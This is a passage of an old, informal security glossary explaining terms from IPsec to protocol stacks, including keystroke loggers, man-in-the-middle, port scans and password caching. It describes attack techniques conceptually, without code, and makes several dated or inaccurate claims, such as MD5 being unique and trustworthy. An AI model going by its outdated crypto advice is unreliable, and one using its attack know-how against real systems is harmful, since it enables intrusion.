Key point: The IP address shows up inadvertently in many communications. By examing the details of e-mail headers, you can usually find the IP address that somebody sent e-mail from -- even if the user is behind a firewall. This a common way that sui dissant hackers are caught: they attempt to use anonymous e-mail services to send mail, only to be caught by the inclusion of their IP address in the headers.

IPsec [3]

Security extensions to IP. Traditionally, encryption takes place at the application layer or above. IPsec provides generic encryption for IP packets in such a way that applications are not necessarily aware of the process. IPsec source code is freely available.

Key point: IPsec's main use today is when tunneling traffic for VPNs. It can also work for generic encryption of data between two hosts.

island-hopping [2]

To break into one system then use it as a beachhead to break into other systems.

History: This was the name for the U.S. military campaign during WW-II in order to take over islands closer and closer to the enemy, using each new island as a base from which to launch further attacks.

Key point: University systems, which are based upon the idea of openess and free sharing, are a hot-bed of compromised systems from which hackers launch attacks. Increasingly, home user machines attached to DSL lines and cable-modems are being compromised and used to launch attacks from.

- J -

- K -

kerberos [3].

An authentication standard.

History: Developed at MIT in the 1980s as part of its project Athena (the netpc product that also spawned X Windows and other technologies). Kerberos has long been available as an add-on to virtually all UNIX systems. Version 4 was discovered to be insecure, and was followed by version 5. Microsoft implemented a variant of version 5 in Win2k.

Key point: Microsft's implementation in Win2k is not quite standard in much the same way that its implementations of PPP, PPTP, IPsec, etc. all make use of proprietary extensions.

kernel [2]

The core of the operating system. The kernel has complete control over everything that happens. When your computer crashes, it means the kernel has crashed. The kernel is designed to coordinate among the different components of the operating system, such as disk drive, networking, keyboard, and running programs.

Key point: The kernel is responsible for security, preventing one program from one user from breaking into other programs running on the same system. All systems except the older Mac and Windows do not provide this level of security.

key [3]

In cryptography, the value needed to encrypt and/or decrypt something. It is usually a number or a short string less than 20 characters long.

Contrast: People are confused as to the difference between a key and a password. A key is a large number whereas a password is simply a series of letters (and possibly digits and punctuation). Since cryptography only uses keys, the password is generally converted to a number through the use of an appropriate mathematical function, like a hash. Public/private keys present a special difficulty in that they contain extremely large, unwieldy numbers that are protected by a seperate password.

Contrast: There are two types of keys:

symmetric keys use the same key for both encryption and decryption
asymmetric (aka public/private key) are produced in pairs, where one key encrypts, but a mirror key must be used to decrypt the message, and somebody with one key cannot figure out the other key.

Contrast: A common question deals with the difference between 40-bit and 128-bit encryption in web browsers like Netscape. The answer is that the most obvious way to break the encryption and read the plain text is to simply try all possible keys. A 40-bit key has roughly one trillion (1,000,000,000,000) combinations. It could take your computer several weeks to try all these combinations. The implication: the average person only needs a few weeks to decrypt any message you send across the wire with a 40-bit browser, should they manage to sniff it from the wire. Every extra bit of key length means the key will take twice as long to crack. Therefore, if a system takes one week to crack a 40-bit key, it will take two weeks to crack a 41-bit key. Therefore, a 128-bit key will take 2^^(128-40) times longer to crack than a 40-bit key (i.e. 309,485,009,821,345,068,724,781,056 times longer).

Example: The following table shows the relative difficulty in cracking keys.

Bits Difficulty

8 paper and pencil (puzzle appears in Sunday paper)

16 tiny computer

32 your desktop computer

40 a few computers and a fair amount of time

56 custom hardware

64 distributed.net (a hundred thousand machine cranking away for a couple of years)

80 government agencies (NSA, CIA)

128 not crackable at the current time

256 quantum computers

Bits	Difficulty
8	paper and pencil (puzzle appears in Sunday paper)
16	tiny computer
32	your desktop computer
40	a few computers and a fair amount of time
56	custom hardware
64	distributed.net (a hundred thousand machine cranking away for a couple of years)
80	government agencies (NSA, CIA)
128	not crackable at the current time
256	quantum computers

Key point: Moore's Law breaks all cryptosystems, eventually. This, and only this, is why DES has become obsolete. Note: 40-bit and 128-bit keys refers to the RC4 algorithm used within web-browsers to talk to web servers via SSL. The U.S. restricts export of all software whose keys are greater than 40-bits in order to be able to spy on foreigners (ostensibly only in a military engagement).

Key point: Keys are generally just "session keys". This means they are dynamically generated at the beginning of a session, and exchanged with the partner using PKI

Key point: The Kerckhoff principle states that cryptography should be based upon the assumption that the enemy will discover all the details of your system. Therefore, all the security of the system should be held within the key. Not only that, the idea is that the details of the system should be actively published and publicized in the hopes that people will analyze the system, discover them, and publish the weaknesses before the enemy gets a chance to. All the best cryptosystems have been well published and analyzed in public forums.

key management (key distribution, key exchange )[4]

Key point: The need to exchange keys is the reason encryption protocols are not secure. There is an absolutely secure encryptiong method called a one-time-pad. However, in practice, you cannot exchange vast quantities of one-time-pads.

Key point: PKI essentially solves the key exchange problem.

keystroke logger [3]

A program that runs in the background that records all the keystrokes.

Key point: Once keystrokes are logged, they are shipped raw to the hacker. The hacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a key logger will reveal the contents of all e-mail composed by the user.

Key point: Keylog programs are commonly included in rootkits and remote administration trojans.

Key point: You can also purchase hardware devices that plugin between the keyboard and the main system (for PCs). These are OS independent, they simply start recording, then the hacker can retrieve the device and instruct it to simply spit out all the characters back again on the hackers system.

known-plaintext [4]

The easiest way to brute-force a key is to contain a sample of both the encrypted message and the original message. One could therefore try all possible ways of decrypting the message until they came up with the equivelent plaintext. This reveals the key, which can then be used to decrypt the remainder of the message or other messages encrypted with the same key.

Contrast: Without known plaintext, key cracking is only a little bit more difficult. Running heuristics on the output of the decryption engine makes the decryption several times harder, but when you think about this, it only means that making it four times harder is only equivelent to adding 2 bits to the key length.

Key point: Most messages contain "headers" that represent known-plaintext. IP packets all have similar headers. E-mail message all contain the same fields. Therefore, there is a fair amount of implicit plaintext that is known even when a decrypted sample of the message doesn't exist.

- L -

LAN (Local Area Network)[1]

On the Internet, you have the "local" machines near you and the "remote" machines across the Internet. Your local network is known as the LAN, and is usually based upon Ethernet.

Key point: Local machines are usually much easier to break into than remote machines across the Internet. For example, you can spoof ARP packets in order to execute man-in-the-middle exploits against your local neighbors.

See also: VLAN

LAN Manager [4]

LAN Manager is the older file server product from Microsoft and IBM. The details of this aren't all that important except that backwards compatibility has introduced security holes in products 10 years later. LAN Manager authentication splits a password into two case-insensitive parts that are 7 letters each. Therefore, if your password was "RobertGraham.com", under LAN Manager it would be the same as "ROBERTG RAHAM.C". Whereas new products like Win98, WinNT, and SAMBA support newer/stronger authentication methods, the need for backwards compatibility often exposes the LAN Manager password, which can easily be cracked.

LDAP [3]

A directory service, LDAP (Lightweight Directory Access Protocol) is used by e-mail programs (Microsoft, Netscape, Eudora, etc.) to allow you to lookup a person's name in a corporate database and find their e-mail address, phone number, and other information that the corporate admins decided to put in there.

Key point: Most corporate LDAP servers have little or no authentication. Finding LDAP servers and downloading their contents is an important step in the reconnaissance phase of a hacking attack.

Key point: While LDAP is in theory lightweight, in practice it is still fairly complicated. There are numerous implementation and deployment bugs that can be exploited in order to break into servers.

least privilege [4]

In paranoid environments, the guiding principle is that of least privilege, meaning that users are granted only the minimal rights needed in order to get their job done, and no more.

Example: System administrators typically have multiple accounts with different rights. For example, when I'm logged in as a normal user, I do not have rights to administor my own machine. I must login as a separeate account in order to do such things, then log out as soon as I'm done.

libnet [4]

Allows low-level manipulation of TCP/IP headers that is impossible for normal programs.

Key point: Most programs go through a high-level interface (like sockets) in order to send traffic on the network. Sometimes, for security or hacking reasons, a program needs to construct its own network headers. The existing TCP/IP stack is unable to build these headers, so you must bypass it and go directly to the hardware drivers. Libnet is a library that makes custom packet generation easier.

libpcap [4]

Allows low-level capture of network traffic. Most UNIX-based sniffers use this library.

TODO:

lp (line printer) [1]

TODO:

Linux [1]

TODO:

lsof [4]

This tool shows all the open file handles, sockets, and who owns them.

Links: You can download lsof from the following mirrors:


ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

ftp://ftp.crc.doc.ca/packages/lsof/

ftp://ftp.sunet.se/pub/unix/admin/lsof/

- M -

MAC address [4]

Every piece of Ethernet hardware has a unique number assigned to it called it's MAC address. Remember that Ethernet is used locally to connect you to the Internet, and you share the local network with many other people. The MAC address is used by your local Internet router in order to direct your traffic to you rather than somebody else in your local area.

Key point: The MAC address is 6-bytes long, and must be unique. In order to guarantee uniqueness, equipement vendors are assigned a unique 3-byte prefix, and they then assign their own 3-byte suffix. Thus, the first 3-bytes of a MAC address identifies what kind of hardware you have (3Com, Cisco, Intel, etc.).

Key point: The uniqueness property of MAC addresses has interesting implications. It was an important clue in tracking down David Smith (the Melissa author).

malware [4]

In an abstract world, the world consists of plants and animals (flora and fauna). Hardware makes up the flora, automated programs with a life of their own make up the malware. Examples: viruses/virii, Trojan Horses, RATs (Remote Administration Trojans), spiders, bots, logic bombs.

man-in-the-middle attack [4]

An attacker where the hacker interproses himself in the middle between two people. Culture: Historically, when talking about such attacks, the hacker is given male names starting with the letter M (like Mark, Mawry, etc.).

Key point: This often means that both sides of a connection really need to authenticate themselves. For example, when you log into a server, you really want to be assured it is the real server you are talking to, rather than Mark who is forwarding your requests to the real server using your identity.

masquerade [1]

An attack where somebody forges their identity, either by supplying false credentials when authenticating or by hijacking existing connections through man-in-the-middle atacks.

MD5 (Message Digest #5, 1.2.840.113549.2.5)[3]

MD5 is the most popular hash algorithm. It processes an input file or message into a "unique" 128-bit fingerprint. This fingerprint is believed to be "unique"; while it is theoretically possible that two inputs could hash to the same fingerprint, it is nearly statistically impossible.

Key point: MD5 is currently enjoying a high degree of popularity. It is the most popular hashing algorithm, used in SSL, PGP, HTTP authentication, Tripwire, and many other places.

Melissa Virus/Worm [1]

In early 1999, the Melissa virus/worm took down much of the Internet for a couple of days.

Controversy: Many security technologies (anti-virus, firewalls, mobile code) are based upon the concept of querying the user with the question: There is a security issue here, are you sure you want to continue? Security professionals have long warned that just depedency is unreliable -- users have to be lucky in answering the questions right all the time, whereas the hacker needs to get lucky only a few times. In the case of the Melissa virus, every user that spread the virus was first prompted with the query: This document contains macros, do you want to run them?, and answered incorrectly.

memory [1]

Key point: Memory gets erased when the computer is turned off. For this reason, one security technique is to store things only in memory. For example, when you first log onto a computer, it will remember your password in memory so that as you access other resources, it can use that password instead of prompting you repeatedly. In this technique, this is never saved to disk. This means if somebody unplugs your computer and runs away with it, they cannot steal your password. Some problems with this technique is that occasionally the memory is swapped to disk anyway.

message [1]

In cryptography, you will often hear the word message in reference to any data. Culturaly, this comes from back during WW-II era when the only thing encrypted were messages. These days we have encrypted communication channels (with no real message boundaries) and encrypted files, but conceptually we still model the problem of cryptography around messages.

Metcalfe's Law [1]

A philosophical point of view: "The power of the network increases exponentially by the number of computers connected to it. Therefore, the every computer added to the network both uses it as a resource while adding resources in a spiral of incrasing value and choice."
-- Dr. Bob M. Metcalfe, inventor of Ethernet, co-founder of 3Com, editor-in-chief of InfoWorld.

The idea is that the power of the Internet is not simply all the websites that you can access (linear), but the power represented by everyone else also on the Internet (exponential). For example, organizations like http://www.distributed.net cannot only harnass lots of machines in order to tackle large problems (linear), but they also can exploit the word-of-mouth on the Internet to sign up (exponential). Similarly, consider the growth in sites like http://www.slashdot.org that start out as hobbiest sites, but eventually blossom into large money making ventures, tossing pre-Internet-age business philosophies on their ear.

Key point: Hacker attacks grow exponentially because more and more hackers are getting online (especially from 3rd world countries) and more and more resources (businesses) are getting online.

Key point: The amount of computing resources a hacker can tap into from his/her computer desktop is more than the combined might of all governments and militaries.

mission critical [2]

Describes a system that is absolutely necessary. It comes from NASA where mission critical elements were those items that had to work otherwise the billion dollar space mission would blow up.

Key point: A big problem with corporations is that they do not spend enough time hardening mission critical applications, or spend too much effort on non-mission critical elements.

mobile code [3]

A term that descibes any software that is mobile, being passed from one system to another. In particular, it is used to describe applets within web browsers based upon Microsoft's ActiveX, Sun's Java, or Netscape's JavaScript technologies.

Moore's Law [1]

Gordon Moore, one of the founders of Intel, remarked in the late 1960s that computing power seemed to double every 12 to 18 months. This prophecy is remarkably accurate. With the rise of the Internet and computing in our lives, this Law has become a basic feature of our society every much so as Newton's Law's.

Key point: Every bit of key length doubles the security, making it twice as difficult to crack. However, because of Moore's Law, every year that passes makes all keys twice as easy to crack. Therefore, if it takes 1-week to break a message encrypted with a 40-bit key, it will likewise take 1-week to break a message encrypted with a 128-bit key roughly 100 years from now.

MTU (Maximum Transmit Unit)[5]

In TCP/IP, the MTU is the largest IP packet that can be transmitted on the network. The MTU for Ethernet, for example, is 1500 bytes. The problem comes into being that when a router is connected to two different networks with different MTUs, it must fragment the packets.

Key point: Path MTU is the combind MTU of all the segments that a packet must travel through. A lot of WAN links have MTUs on the order of 576 bytes. Therefore, packets traveling through such networks will result in heavy fragmentation.

Key point: IDSs hooked up to a hybrid Token Ring (MTU=16k) and Ethernet (MTU=1.5k) network generate lots of false positives about the large amount of fragmentation going on.

multi-homed [5]

A computer may have multiple adapters and multiple IP addresses. We called these multi-homed hosts. The existence of such machines makes some security processes difficult. UDP based transactions (like DNS) sometimes show anomolies because the responses come back from IP addresses different than the one the request was sent to. Sun workstations demonstrate and even more difficult problem: if multiple adapters are installed within the workstation, they are all assigned the same MAC address. Sometimes people hook both adapters to the same ethernet network. This means that every incoming packet is received by both adapters, so every request is seen multiple times, and responded to multiple times. The symptoms are that on UDP based protocols, every request sent to the multi-homed Sun computer gets multiple responses back.

Key point: Miconfigured multi-homed hosts are common enough that it makes distinguishing their anomolies vs. hacker anomolies difficult.

- N -

NAT [3]

Network Address Translation, NAT is a way of providing access to the Internet through a single machine that translates the IP addresses. The NAT itself has one or more IP addresses, but all the machines behind the NAT have "private" Internet addresses.

Contrast: A NAT provides some firewalling capabilities because isolates the end-nodes while still providing access to the Internet. The isolation is better than packet-filter firewalls, but not as good as proxies.

NetBIOS [3]

In Windows, NetBIOS is a way for writing network-aware applications, much like sockets is for UNIX.

Misunderstanding: Like sockets, many different protocols can be used to transport applications written to the NetBIOS API. When you say "NetBIOS", some people will understand you to mean the TCP/IP transport. Other people will think of "NetBEUI", which is the transport over raw Ethernet without any intervening routable network protocol. Use the term "NBT" (NetBIOS-over-TCP) or "NetBEUI" to avoid confusion.

Contrast: Microsoft's "File and Print Sharing" uses the SMB protocol over NetBIOS. Microsoft supports the NetBIOS interface over TCP/IP, NetBEUI, and Novell's IPX/SPX. Home users who share files among their own machines mistakenly enable File and Print Sharing using the TCP/IP transport, allowing hackers anywhere on the Internet access to their machine. Instead, they should configure it over the NetBEUI transport so that nobody outside their network can access their files (note: this still might open up their networks to people on the same cable-modem VLAN ).

History: Originally developed by SyTek for IBM. It was implemented in the ROM of IBMs broadband Ethernet (3-mbps, over cable TV coax rather than normal Ethernet coax, separate send/receive channels).

More: If you maintain a firewall, you will see regular NetBIOS requests in your logs. Read the document http://www.robertgraham.com/pubs/firewall-seen.html#netbios for more info.

NIT [5]

Network Interface Tap The system for SunOS 4 that allows sniffing packets off the wire. Replaced by DLPI in Solaris.

nmap [2]

nmap is the most popular hacker tool for doing reconnaisance scans against a target network. It is available at http://www.insecure.org/nmap/

Key point: nmap is preferred over vulnerability scanners because it is much less noisy. Hackers prefer focused tools that do their job well rather than comprehensive tools that likely do unwanted things.

nonce [5]

In communications, a nonce is a specific value inserted into the message in order to defend against replay attacks. A nonce is usually random.

non-repudiation [5]

One of the main classes of infosec, non-repudiation is the idea that somebody cannot "renege" on an action.

TODO

NSA (National Security Agency)[1]

The NSA is the government department for U.S. national security. All cryptographic work done by the government is done under the auspices of the NSA. The NSA probably employs some of the best/brightest cryptographers in the world. The NSA does a fair amount of eavesdropping/spying on people in foreign countries.

NTFS [3]

NT File System. An optional way of formatting disks under WinNT that contains numerous performance, reliability, and security enhancements over the older FAT filesystem found in DOS.

Key point: Hardened WinNT computers should use NTFS exclusively. After installation, some file and directory permissions need to be adjusted.

Key point: NTFS supports a feature called "alternate datastreams" (similar to Macintosh data and resource forks) that can be used to attach data to files in a hidden way. The additional information does not appear to change the size of the file in directory listings.

- O -

obscurity [2]

A philosophy where people believe in the theory of Security through obscurity, but hiding in the hopes that hackers can't find you. In practice, this theory is found to be wrong.

Example: Many people put their POP3 service at a different port than port 110 as a way to foil attacks against that port. However, a simple port scan reveals this port, and the banner reveals what service is running at that port.

Key point: The security landscape is littered with foolish people who try short-cuts around the tried-and-true techniques.

Key point: Obscuring information always helps security. The only question is whether it is your prime security defense, or an adjunct to it.

Key point: Do the math: if you obscure things such that a successful attack is 99% less likely, this means 10 out of a thousand attacks will succeed. In general, hackers have the resources to through billions of attacks against an obstacle: it's just automated computer time and network traffic.

one-time pad (OTP, Vernam Cipher)[2]

In cryptography, the one-time pad encrypts data by XORing the plaintext against a stream of completely random bits. In theory, the one-time pad is the only unbreakable encryption algorithm, even with infinite resources or quantum computers. This is because if the key (aka. pad) is totally random, then the ciphertext will be random as well.

Problem: While the one-time pad is perfectly secure in theory, it has problems in practice, and is rarely used. The major problem is how one distributes the one-time pads to all the receivers. This can be done in some cases, such as sending out CD-ROMs full of random bits with soldiers on the battle-fields, but it becomes unwieldy for normal uses of cryptography.

Key point: The pad (secret key) can be used only once. If it is ever used twice, then much of the plaintext can be easily recovered. This means that the pad must be as long as the data being encrypted.

History: The one-time pad was invented by G. S. Vernam in 1926, and saw heavy use during WWII. It is still used today in diplomatic corps.

Rumor: There are many short-wave radio stations throughout the world broadcasting a human voice reading off long lists of numbers. These are thought to be messages sent to spies throughout the word who decode them with one-time pads.

Key point: Today's encryption algorithm are based upon the theoretical underpinnings of the one-time pad.

Orange Book[3] .

A member of the Rainbow Series, it describes different classifications of a secure system. The four main classifications are:

D - not secure
C (C1, C2) - discretionary (different parts are secure in a different way)
B (B1, B2) - mandatory, meaning that everything on the system must be locked down
A (A1, A2) - verified, meaning everything is double-checked according to rigorous standards

OSPF (Open Shortest Path First)[3]

OSPF is a "routing" protocol. It is used by routers (inside an ISP or coporation) to figure out which paths packets should take when forwarded through the network.

Key point: OSPF can easily be subverted by "local" hackers. This means that hacker generally has to be within network area he/she wishes to subvert. The hacker will either pretend to be a router, or spoof packets from nearby routers. The most common technique is to "advertise" false information (spoof Link State Advertisements (LSA)).

one-time password [3]

TODO: skey

OS (operating system) [2]

TODO:

own [2]

A hacker culture term that means to control completely. A machine broken into and under completely under control of the hacker is "owned".

See also: attitude

- P -

packet [1] .

All data sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.

Analogy: Imagine looking at an automobile freeway during rush hour from an airplane. The freeway looks like a flowing river, but each individual car (packet) is really independent from all the others. While it looks like the cars on the freeway are going in the same direction, each car really has its own source and destination separate from the others around it. This is how Internet core routes look.

Analogy: Now consider that a bunch of coworkers leave the office and go to a party. Each gets in his/her own car and drives to the party. Each person may take a slightly route, but they all end up together at the party. This demonstrates how data is broken up into individual packets, sent across the Internet (potentially following different routes), then reassembled back again at the destination.

Key point: Conceptually, networking occurs at abstract layers well above the concept of packets. Users type in a URL, and the file is downloaded. By dealing with the raw packets themselves, hackers are frequently able to subvert communications in ways not detectable at these higher layers.

Contrast: The term "packet switched network (PSN)" is used to describe the Internet, whereas the term "circuit switched network (CSN)" is used to contrast it with the traditional phone system. The key difference is that in the phone system, the route between two people is setup at the start, and each bit in the stream follows that route. On the Internet, each packet finds its own route through the system, so during a conversation, the packets can follow different paths, and indeed arrive out-of-order. Another key difference is latency. The phone system forwards each bit one at a time, so as soon as one arrives, it doesn't have to wait before forwarding it on. On the Internet, bits are bunched together before transmission. Each hop must wait and receive all the bits before forwarding any of them on. Each hop therefore adds a significant amount of delay. Gamers know this as the "ping" time.

Key point: There are other technologies that use packets, not just the Internet. Before the Internet came along, X.25 networks were a popular form of packet-based communication (and indeed, X.25 formed the basis for many links on the nascent Internet).

packet filter [3]

In firewalls, packet filters are the technology most often used to control traffic. Every packet contains the following fields:

source IP addresss (example: 192.0.2.156)
destination IP address
transport type (example: TCP=6, UDP=17, ICMP=1)
source port (example: HTTP=80, DNS=53, FTP=21)
destination port
flags (example: SYN)

This data is compared against "rules" within the firewall. A typical set of rules might be:


BLOCK destination=192.0.2.x TCP flag=SYN

ALLOW destination=192.0.2.123 TCP destport=80

ALLOW destination=192.0.2.124 TCP destport=25

If our private network is 192.0.2.x, then the first rule above blocks all incoming TCP connections (though outbound connections would still be allowed). The following rules override the first, allowing access to the webserver at port 80 and access to the e-mail server at port 25.

Key point: The basic stance of a company firewall is:

blocks all UDP traffic except for DNS
blocks all incoming TCP connections but allows all outgoing ones
allows incoming connections to public HTTP, FTP, SMTP, and DNS servers located in a "DMZ".
blocks all ICMP traffic except for those packets needed for path MTU discovery.

This allow most access to the Internet for end-users and allows the Internet to access the public servers. It blocks everything else.

Contrast: The word "dynamic packet filter" was coined to contrast with the normal "static filter" rules in a firewall described above. Dynamic rules are needed because:

Ports are a poor way of identifying protocols (and getting poorer)
Whereas most communication uses only outbound connections, some (like FTP) use multiple connections in both directions.

In the case of FTP, the client creates an outbound connection to the server, then the server creates separate inbound connections in order to transfer files to the client. Static firewall rules would block this incoming connection, dynamic rules monitor the state and temporarily change the static rules just to allow that connection. An example of a "dynamic" rule is to solve the FTP problem is:

Block all incoming connections, but if the user has established a connection to port 21 on a server, then allowing incoming TCP connection from the server port 20 to ports higher than 1024 on the client.

Another type of "dynamic" rule is one where the firewall does protocol analysis at layers higher than TCP. To contrast with the example above, the firewall might analyze the FTP connection connection looking for the PORT command. (The "PORT" command is the FTP protocol whereby the client tells the server which port is has opened to receive a file on). Checkpoint calls this protocol analysis "stateful packet inspection" in their firewall. Other vendors do similar stuff, but call it different names.

password [1]

A string of characters that a user must know in order to gain access to a system.

Key point: The most important defensive mechanism that a corporation can take is to create and enforce policies about proper password usage.

Key point: A leading cause of compromise are programs that leave behind default passwords. A leading cause of compromise are users who choose weak passwords that can easily be guessed or cracked.

Tools: The crack programs can be used to maintain a strong policy>

Tools: On Windows NT, the "passflt.dll" and "passprop.exe" tools can be used to enforce strong passwords.

Misunderstanding: People used to believe that a good password was a random mix of UPPER and lower case, numbers, and punctuation. However, this generates passwords that are impossible for users to remember, so they find ways around the restriction, such as writing passwords down on Post-It notes. Therefore, somebody can compromise the network by simply looking for Post-It notes (such as pasted to the bottom of a keyboard).

Controversy: Many policies declare that a password must be changed frequently, and most OSes come with tools for enforcing this. However, this leads to the same problem as above: it causes pain for users, so they behave in ways that reduce security. Also, it isn't clear that it dramatically increases security.

Contrast: Passwords aren't the only authentication scheme possible. Crypto-cards are often used to generate "one-time passwords" or challenge-response authentication.

Tip: Use a PalmPilot and a crypt program to store your many passwords.

See also: grind, crack, password cache, 8-character password.

password cache [3]

A temporary copy of the password. Internal to the computer, password information is constantly being checked. If you were queried for the password each and every time, you would find that computer would become unusable. Therefore, the computer attempts to "cache" the password so that internal prompts during the same session do not cause external prompts to the user.

Key point: All systems cache passwords in memory during a login session. Therefore, if a hacker can gain access to all memory on the system, he/she can likely sift the memory for passwords. Likewise, hackers can frequently sift pagefiles for passwords.

Key point: Many programs whose goal is ease-of-use will ask the user if they want to save the password on disk (in a file or registry. For example, the MS Outlook e-mail client has this feature to cache the POP3 passwords. Therefore, hackers have programs that will sift the file system or registry or these passwords. Some systems will store these cached passwords in clear-text, others attempt to encrypt the passwords, but usually this encryptiong mechanism ca be defeated.

PBX (Private Branch Exchange) [3]

The PBX forms the hub of a company's phone system. Phreakers hunt for PBXs that they can bounce calls through, especially long distance calls.

people [3]

The following are a list of people in the security community who are noteworthy for their accomplishments.

Bruce Schneier: His book, Applied Cryptography is the standard book for both beginners and experts. Get a copy now. He is also the creator of the Blowfish encryption algorithm.

PERL [4]

A popular cross-platform scripting language.

Key point: v5 of PERL has the concept of "tainted" input that cannot be passed raw to the operating system without preprocessing. This is an amazingly useful feature that solves the majority of input validation problems in CGI scripts.

pgp (pretty-good-privacy[2]

Popular encryption program. It was created by a fellow named Phil Zimmerman as a subversive act. Phil later exploited it as a social-engineering attack against the business community.

Key point: All true hackers use open-source versions of PGP to encrypt their data.

phf [4]

One of the first major cgi-bin attacks to be found in 1996 by Jennifer Myers.

Key point: This attack has become "classic". Virtually all CGI scanners search for it, and the typical intrusion detection system will trigger on it.

Key point: It falls victim to the input validation problem in order to allow for directory climbing.

philosophy [1]

Discussions of infosec and hacking is governed by certain philosophical points of view.

Usability != Security: Any company following robust security practices will generate complaints from the users.
You cannot escape human nature: If you block users from doing things, they will find ways around your blocks. Example: If you block all incoming traffic but HTTP to a webserver, then your database people will put database front-ends on your webserver. If you put personal firewalls on user's desktops that block interesting traffic, they will disable the entire firewall.
Security through obscurity: The failed point of view that simply hiding will protect you, such as "Nobody can find my machine in the vastness of the Internet, therefore I don't have to password protect it.". Note that you should still hide details as much as possible, but you should "harden" your systems properly.
fail-open vs. fail-close: When a system fails, how should it leave things: open or closed? For example, if a firewall crashes, should it disable all network connectivity, or should it allow network connectivity to continue unprotected?

phreaking [2]

Hacking the phone system.

Key point: Most of the literature available on the net applies to phone systems that are 20 years old. These techniques rarely work on modern phone systems.

Key point: 2600 Hz is the frequency of the whistle that was provided in Captain Crunch cereal boxes that was also a signaling frequency for phone systems in the 1960s.

ping [1]

The "ping" command is built into both Windows and UNIX machines as a universal way of testing network response time and performance. The name is really based off the similarity to sonar pings, though many people have create a post hoc acronym "Packet INternet Groper".

Example: The ping-of-death attack used IP fragmentation to crash systems. It was so named because the ping program built-in to Windows could be easily told to fragment packets this way.

Key point: Even though the ping program is simple, it can be abused. Some versions can be commanded to send packets as fast as possible, which is often done to flood networks. Most versions allow the packet size to be set to a large size, forcing fragmentation. When used with the flood above, it can overload machines since fragmentation reassembly is so slow.

PKI (Public Key Infrastructure) [3]

PKI is largely a marketing buzzword by RSA.

plaintext [3]

A message that is not encrypted and therefore easily read.

Key point: Depending upon context, plaintext can refer to the contents of a message before encryption, after it has been decrypted, or even a message that is in the "clear" and not encrypted at all.

Key point: Many networking protocol protocols use plaintext passwords that can simply be sniffed off the wire.

policy [3]

In corporations, the document that explains/clarifies the security stance of the corporation.

Key point: Nerds hate bureaucracy, and frequently resist clarifying the security stance. Policy statements are frequently useful, and small ones given to new employees help prevent a lot of problems before they start. They are also useful CYA: when an executive starts complaining about something not working through the firewall, it helps to pull out the Policy and explain that it isn't allowed.

Key point: Policy documents bring out the "process" bureaucrats who will spend hours debating the policy in order to avoid real work that they might be judged upon. As a result, many companies spend a lot of effort creating useless policy documents.

Key point: A good rule of thumb: only put things in the policy document that include a plan on how you enforce it. For example, if you say "users should choose strong passwords", include a plan on how to enforce them.

Example: A policy might contain the following items:

privacy policy: Web-sites frequently declare what information they collect and store about visitors. Software products have been caught invading peoples privacy and are beginning to have similar statements included with them. Corporations have the ability to read user's e-mail and monitor their activities. Finally, new U.S. regulations require special handling of a person's private medical data.
access policy: How has access to what and why. A common problem inside companies is that they allow too much access to too many people for convienience's sake.
accountability
authentication
availability: Which resources must be available 24x7.
Internet usage policy: Example: no porn sites.
violation handling: What actions are taken when an employee violates the guidelines?
incident handling: What happens when a hacker is detected?

POP3 (Post Office Protocol v3) [1]

This is the most popular protocol for picking up e-mail from a server. The e-mail client program will open a connection to port 110 on the server, then pull down each e-mail message from the server.

Key point: Since e-mail is one of the most popular services on the Internet, there are a huge number of different implementations of POP3 services.

port [1]

In TCP/IP, a port is an extension of an Internet address that tells wich program is to receive the data. In other words, if I send data to 192.0.2.111, port 110, then I'm talking to the POP3 e-mail service. However, if I send something to port 80 on the same machine, then I'm talking to the web server on that machine.

Key point: I can have two URLs that look like http://www.robertgraham.com:80/ and http://www.robertgraham.com:90/. These two URLs access different web server programs running on the same machine, one at port 80 and that other at port 90.

port scan [2]

In hacker reconnaissance, a port scan attempts to connect to all 65536 ports on a machine in order to see if anybody is listening on those ports.

Contrast: A stealth scan attempts to evade detection. The most common kind is a TCP half-open scan which fails to complete the three-way handshake. This prevents the application listening on a port from being notified that a connection attempt has taken place, so it won't log that fact. Most "stealth" scans attempt to evade logging on the host, but this makes more destinctive signatures that intrusion detection systems can detect.

Key point: Ports scans are not illegal in many places, those laws have yet to be written on the subject. The Norwegian Supreme court ruled that they are not illegal because they don't actually compromise the system. There is also the technical problem that they can easily be spoofed, so it is hard to prove guilt. There is even the third problem that virtually any machine on the Internet can be tickled into scanning somebody else; the hacker doesn't break into that third party, but triggers special conditions that causes the effect of a port scan.

Controversy: Many people think that port scanning is an overt hostile act and should be made illegal.

Contrast: Full port scans of all 65536 ports are rarely seen, especially since they are so obvious. Instead, hackers will strobe for just the ports he/she is interested in. These strobes are for typically fewer than 10 ports. Also, the hacker will often sweep thousands (or millions) of machines rather than a single machine looking for any system that might be vulnerable.

Tool: The best tool for doing port scans is nmap from http://www.insecure.org/nmap.

PPP [3]

The standard protocol for connection via a modem to an ISP. TODO:

privilege escalation [4]

A classic attack against a system. A user has an account on a system, and uses that account to gain additional privileges they weren't meant to have.

Key point: Virtually all local exploits are privilege escalation attacks.

Key point: The most common example of this attack is through setuid programs that have known bugs in them, often through buffer overflows or race conditions.

protocol [3]

The rules that govern how things communicate over the network.

Key point: By manipulating the protocol raw themselves, hackers can do powerful things that are impossible in an application. For example, client applications typically limit the length of a username that can be typed in. By manipulating the protocol raw, hackers can supply any sized username they want, sometimes causing a buffer overflow exploit.

Key point: Protocols are either text-based or binary. Text-based protocols can be read directly off the wire and manipulated directly. Binary protocols require a protocol analyzer to decode them, and must be manipulated programmatically.

See also: See the section on "banners" for examples of what some protocols look like on the wire.

protocol stack [3]

In networking, protocols are layered on top of each other, wich each layer responsible for a different aspect of communication. For TCP/IP, the protocol stack looks something like:

HTTP	Telnet	POP3	SNMP	bootp
TCP			UDP		ICMP
IP						ARP
PPP			Ethernet

The way that you would use this diagram is the following paragraph: You use the protocol HTTP to request a web-page. The HTTP client (web-browser) contacts the HTTP server (web-site) using the protocol TCP. The protocol TCP segments all its work into IP packets. Routers on the Internet know how to forward the IP packets, but are clueless as to whatever is inside the IP packets. Your machine will use somethine like PPP or Ethernet in order to send IP packets to the nearest router.

Key point: Encryption can happen at any layer.

Payload The data itself can be encrypted independent of the protocols used to transport it. For example, a typical use of PGP is to encrypt a message before sending via e-mail. All the e-mail programs and protocols are totally unaware that this has occurred.

Application Layer Some applications have the ability to encrypt data automatically. For example, SMB can encrypt data as it goes across the wire

